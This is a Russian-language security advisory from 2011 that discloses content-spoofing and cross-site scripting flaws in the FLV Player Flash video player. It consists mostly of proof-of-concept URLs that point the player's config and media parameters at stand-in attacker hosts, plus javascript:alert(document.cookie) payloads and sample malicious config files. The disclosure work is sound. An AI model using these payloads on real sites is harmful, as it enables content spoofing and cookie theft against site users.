Уязвимости в FLV Player

2011-08-24T00:00:00
ID SECURITYVULNS:DOC:26894
Type securityvulns
Reporter Securityvulns
Modified 2011-08-24T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Content Spoofing и Cross-Site Scripting уязвимостях в флеш видео плеере FLV Player.

Content Spoofing (WASC-12):

Флешки плеера FLV Player принимают произвольные адреса в параметре configxml, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.

http://site/player_flv.swf?configxml=http://attacker/1.xml http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Флешки плеера FLV Player принимают произвольные адреса в параметре config, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.

http://site/player_flv.swf?config=http://attacker/1.txt http://site/player_flv_maxi.swf?config=http://attacker/1.txt http://site/player_flv_multi.swf?config=http://attacker/1.txt

Флешки плеера FLV Player позволяют подделать все важные параметры, в том числе flv и startimage, и при этом принимают произвольные адреса в параметрах flv и startimage, что позволяет подделать содержимое флешки - например, указав адреса видео и изображения с другого сайта. А для указания ссылки на произвольный сайт можно использовать параметры onclick и ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(documentcookie) http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

Файл xss.xml:

<?xml version="1.0" encoding="UTF-8"?> <config> <param name="onclick" value="javascript:alert(document.cookie)" /> <param name="ondoubleclick" value="javascript:alert(document.cookie)" /> </config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt http://site/player_flv_multi.swf?config=http://attacker/xss.txt

Файл xss.txt:

onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie)

Уязвимы версии MINI, NORMAL, MAXI и MULTI плеера. Замечу, что версия NORMAL встречается под именами player_flv.swf и player_flv_classic.swf.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/5098/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua